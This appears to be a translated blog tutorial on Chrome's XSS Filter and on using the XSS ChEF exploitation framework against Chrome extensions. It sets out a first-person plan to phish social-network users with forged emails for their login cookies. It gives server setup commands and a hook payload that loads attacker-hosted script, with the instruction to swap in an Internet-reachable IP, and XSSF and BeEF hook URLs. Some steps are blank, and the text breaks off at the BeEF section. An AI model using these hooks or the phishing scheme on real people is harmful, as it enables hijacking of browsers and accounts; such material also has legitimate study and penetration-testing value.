About Chrome
The Chrome development team focuses on only three things: stability, speed, and security. Anyone who has used Chrome knows its stability and speed well, but what about its security? It is hard to judge whether a piece of software is secure. Fortunately there is the Pwn2Own hacking contest, where any vulnerabilities in the software get exposed in a high-quality competition.
After reading about last year's Pwn2Own competition, I gained a certain understanding of Chrome's security, which has given me a deeper understanding of it.
As we all know, XSS vulnerabilities come in two basic forms: stored XSS and reflected XSS. Stored XSS persists the cross-site script: if user input is not encoded when it is processed and dynamic content is not encoded when the page is rendered, every user who visits that page is affected. Reflected XSS uses a specially crafted URL: the URL's request parameters contain the cross-site script, and if the page does not filter them, the parameter content is echoed straight into the page, so the user is hit by XSS.
XSS Filter mainly targets reflected XSS. Some may ask: with reflected XSS, how would anyone ever visit such an unknown link? Imagine that an SNS website full of spam has an XSS vulnerability and you have set it to log you on automatically. I want to steal your account, and I know who you recently fell in love with, and she is your friend on this SNS! With that information it is easy to steal your account. First I carefully construct a link whose parameters carry a cross-site script, then I forge a notification email from this SNS saying that she commented on your photo and called you handsome! The comment link points to this malicious URI, and the From header is modified so the mail appears to come from the SNS website. When you receive it, even with strong security awareness, are you sure you would calmly inspect the URL before clicking? If you click, I get your login cookie or capture some of your private SNS content! And if I want to steal many people's accounts, I replace the love-interest story with "join the XXX activity organized by XXX network and get XXX for free" and mass-mail it! I believe there are still plenty of people who like free XXX! When I was in elementary school I was told not to go where it is crowded; it is mostly unsafe! That principle seems to apply to the Internet as well.
Chrome introduced the XSS Filter to protect users who cannot resist such temptations. Its basic principle is that whenever a JavaScript script is about to execute, it is compared against the request parameters; if the script to be executed also appears in the request parameters, its execution is blocked. That sounds good, but there are also many ways to bypass the filter. Some have been published online by well-known researchers; some of those have been fixed officially and some have not, and there may be many more 0-days that have not been disclosed.
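To make the filter's rule concrete (and the reflected-XSS pattern from the previous paragraph), here is a toy model of the "script also present in the request parameters" check, written as an added example for this page; it is not Chrome's code or part of XSS ChEF, and the `samplePage` URL and scripts are constructed inputs.

```javascript
// Added example: a simplified model of the reflected-XSS rule used by
// Chrome's XSS Filter. Real Chrome inspects far more than this (attributes,
// partial matches, encoding variants); this only shows the core idea that a
// script whose body is echoed from a request parameter is refused execution.

// Collect every decoded value from a URL's query string.
function requestParamValues(url) {
  const u = new URL(url);
  return Array.from(u.searchParams.values());
}

// Normalise so case and whitespace differences do not hide a match.
function normalise(s) {
  return s.replace(/\s+/g, "").toLowerCase();
}

// Return the inline scripts whose body is reflected from a request parameter.
// These are the ones the filter would block; all others run normally.
function reflectedScripts(url, inlineScripts) {
  const params = requestParamValues(url).map(normalise);
  return inlineScripts.filter((script) => {
    const body = normalise(script);
    return body.length > 0 && params.some((p) => p.includes(body));
  });
}

// Constructed sample page: one script authored by the site itself and one
// that the vulnerable page echoed straight out of the ?q= parameter.
const samplePage = {
  url: "http://example.test/search?q=" +
    encodeURIComponent("<script>alert(1)</script>"),
  scripts: ["initSearchBox()", "alert(1)"],
};

// Only the echoed script is flagged; the site's own script is left alone.
// returns ["alert(1)"]
reflectedScripts(samplePage.url, samplePage.scripts);
```

The same page visited without the reflected payload flags nothing, which is why the filter only helps against reflected XSS and does nothing for stored XSS, where the script never appears in the request.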
Krzysztof Kotowicz (https://github.com/koto/xsschef) wrote a tool, the Chrome terminator: XSS ChEF (Chrome Extension Exploitation Framework).
More about its features here: http://www.toolswatch.org/2012/08/xss-chef-v1-0-chrome-extension-exploitation-framework/
Obtain the source code
root@Dis9Team:~# cd /var/www
root@Dis9Team:/var/www# git clone https://github.com/koto/xsschef.git
Cloning into xsschef...
remote: Counting objects: 540, done.
remote: Compressing objects: 100% (297/297), done.
remote: Total 540 (delta 333), reused 446 (delta 239)
Receiving objects: 100% (540/540), 310.97 KiB | 102 KiB/s, done.
Resolving deltas: 100% (333/333), done.
root@Dis9Team:/var/www/xsschef# ls
bootstrap     hook.php       README.md   server-xhr.php    tools
console.html  LICENCE        server.js   snippets          vulnerable_chrome_extension
favicon.ico   php-websocket  server.php  snippets.xml.php  xsschef.js
root@Dis9Team:/var/www/xsschef#
Node.js
It offers two ways to start the server: Node.js and PHP. Node.js is a JavaScript toolkit for building high-performance network servers, and it is easy to pick up.
root@Dis9Team:/var/www/xsschef# sudo apt-get install libssl-dev
root@Dis9Team:/var/www/xsschef# cd /tmp
root@Dis9Team:/tmp# wget http://nodejs.org/dist/v0.8.7/node-v0.8.7-linux-x86.tar.gz
root@Dis9Team:/tmp# tar xf node-v0.8.7-linux-x86.tar.gz
root@Dis9Team:/tmp# cd node-v0.8.7-linux-x86
root@Dis9Team:/tmp/node-v0.8.7-linux-x86# mkdir /usr/local/node
root@Dis9Team:/tmp/node-v0.8.7-linux-x86# cp -rf * /usr/local/node/
root@Dis9Team:/tmp/node-v0.8.7-linux-x86# ln -s /usr/local/node/bin/n* /usr/bin/
Install the required modules
root@Dis9Team:/tmp/node-v0.8.7-linux-x86/node_modules# cd /usr/local/node/
root@Dis9Team:/usr/local/node# npm install websocket
root@Dis9Team:/usr/local/node# npm install node-static
Start the server
root@Dis9Team:/var/www/xsschef# node server.js
XSS ChEF server
by Krzysztof Kotowicz - kkotowicz at gmail dot com
Usage: node server.js [port=8080]
Communication is logged to stderr, use node server.js [port] 2>log.txt
Wed Aug 22 2012 03:20:10 GMT-0700 (PDT) ChEF server is listening on port 8080
Wed Aug 22 2012 03:20:10 GMT-0700 (PDT) Console URL: http://127.0.0.1:8080/
Wed Aug 22 2012 03:20:10 GMT-0700 (PDT) Hook URL: http://127.0.0.1:8080/hook
Hook: http://127.0.0.1:8080/hook
UI: http://127.0.0.1:8080/
In the console UI, click "Get hook code".
Example:
if(location.protocol.indexOf('chrome')==0){d=document;e=d.createElement('script');e.src='__HOOK_URL__';d.body.appendChild(e);}
Then:
Replace __HOOK_URL__ with your hook address, http://127.0.0.1:8080/hook (or hook.php when using the PHP server), substituting an Internet-reachable IP address. Mine is:
Test attack
He provides a deliberately vulnerable Chrome extension, vulnerable_chrome_extension, in the xsschef directory.
Install this extension in Chrome.
Run the extension and inject the XSS hook code.
Select the session.
We can now run actions against the hooked extension.
It ships with many ready-made snippets to evaluate by default.
Trivial JS
With BeEF and XSSF
XSSF
Start XSSF
msf > xssf_urls
[+] XSSF Server : 'http://10.0.3.15:8888/' or 'http://:8888/'
[+] Generic XSS injection: 'http://10.0.3.15:8888/loop' or 'http://:8888/loop'
[+] XSSF test page : 'http://10.0.3.15:8888/test.html' or 'http://:8888/test.html'
[+] XSSF Tunnel Proxy: 'localhost:8889'
[+] XSSF logs page: 'http://localhost:8889/gui.html?guipage=main'
[+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
[+] XSSF help page: 'http://localhost:8889/gui.html?guipage=help'
msf >
Hook: http://5.5.5.4:8888/loop
Insert:
BeEF
Start BeEF...